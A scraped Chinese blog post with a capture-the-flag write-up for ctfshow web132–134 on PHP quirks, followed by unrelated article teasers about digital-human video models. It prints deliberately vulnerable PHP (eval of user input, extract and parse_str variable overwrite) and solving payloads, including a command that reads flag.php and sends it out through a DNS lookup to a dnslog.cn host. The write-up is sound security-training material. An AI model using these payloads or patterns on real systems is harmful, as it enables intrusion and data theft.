news 2026/7/2 3:00:54

ctfshow 132,133,134(php特性)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
ctfshow 132,133,134(php特性)

web132

打开指挥是个blog网站,我们用dirsearh扫描一下目录

访问/admin/index.php

查看源码

<?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){ if($code == 'admin'){ echo $flag; } } }

&&需要两边同事都要满足,而||只需要两边任意一个满足就行了。

我们满足username="admin" 然后内层if还要求code='admin' 还要带上password 因为必须有

?code=admin&username=admin&password=

web133

源码

<?php error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){ eval(substr($F,0,6)); }else{ die("6个字母都还不够呀?!"); } }

源码中只对前六个字符作为php代码执行,,因为这个题无显然后这道题用到了数据外带。

需要用到dnslog.cn获取

?F=`$F`; ping `cat flag.php | grep ctfshow | tr -cd "[a-z]"/"[0-9]"`.vlyye3.dnslog.cn -c 1

tr -cd就是只保留指定字符

-c 1就是ping1一次

截取出来的用8 4 4 4 12分开,并且手动添加- 因为这里我们只要求返回0-9和a-z的。

web134

<?php highlight_file(__FILE__); $key1 = 0; $key2 = 0; if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) { die("nonononono"); } @parse_str($_SERVER['QUERY_STRING']); extract($_POST); if($key1 == '36d' && $key2 == '36d') { die(file_get_contents('flag.php')); }

@parse_str($_SERVER['QUERY_STRING'])这一行

$_SERVER['QUERY_STRING']的意思就是读取?后的。

parse_str,将字符串解析成多个变量

例如?a=123&b=456

就变成$a=123 $b=456

而传入的里面又不能只有key1,key2

?_POST[key1]=36d&_POST[key2]=36d

让他给咱前面添加一个。然后看源代码拉到底部。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/1 18:56:33

从频域视角重构空洞卷机

CVPR FADC&#xff1a;从频域视角重构空洞卷积&#xff01;论文原文 &#xff1a;https://arxiv.org/abs/2403.05369 代码&#xff1a;https://github.com/ying-fu/FADC 即插即用代码仓库&#xff1a;https://github.com/AITricks/AITricks 《Frequency-Adaptive Dilated Convo…

作者头像 李华
网站建设 2026/6/26 11:51:30

Arxiv每日学术速递推送Sonic相关研究进展

Sonic&#xff1a;轻量级语音驱动数字人技术的平民化突破 在短视频日更、直播带货常态化、AI内容生产需求井喷的今天&#xff0c;一个现实问题摆在创作者面前&#xff1a;如何以最低成本&#xff0c;快速生成一段“会说话”的数字人视频&#xff1f;传统方案动辄需要3D建模师、…

作者头像 李华
网站建设 2026/6/28 23:04:50

Sonic模型适配虚拟主播场景,实现7x24小时不间断直播

Sonic模型适配虚拟主播场景&#xff0c;实现7x24小时不间断直播 在电商直播间里&#xff0c;一个形象精致的虚拟主播正娓娓道来最新款产品的卖点——语气自然、口型精准、表情生动。更令人惊讶的是&#xff0c;这并非由专业团队耗时数日制作的预录视频&#xff0c;而是AI实时驱…

作者头像 李华
网站建设 2026/6/29 0:07:38

通过API接口远程调用Sonic服务生成数字人视频

通过API接口远程调用Sonic服务生成数字人视频 在短视频日活破十亿、虚拟内容消费呈指数级增长的今天&#xff0c;一个现实问题摆在内容创作者面前&#xff1a;如何以极低的成本&#xff0c;在几分钟内批量生成高质量的“会说话的人物”视频&#xff1f;传统方案依赖真人出镜或3…

作者头像 李华
网站建设 2026/6/28 23:16:07

MicroPython片上外设映射关系全面讲解

深入理解MicroPython的片上外设映射&#xff1a;从GPIO到SPI&#xff0c;打通软硬交互的关键路径你有没有遇到过这样的情况&#xff1a;写好了MicroPython代码&#xff0c;烧录进开发板后却发现LED不亮、传感器没响应&#xff1f;或者UART通信一直收不到数据&#xff0c;查了半…

作者头像 李华
网站建设 2026/6/26 12:06:19

研究生课题基于Sonic改进唇形同步算法精度

研究生课题基于Sonic改进唇形同步算法精度 在虚拟主播24小时不间断直播、AI教师批量生成教学视频的今天&#xff0c;一个关键问题始终困扰着数字人开发者&#xff1a;嘴型对不上声音。哪怕只是几十毫秒的偏差&#xff0c;都会让用户产生“这不是真人”的认知断裂。而真正实现自…

作者头像 李华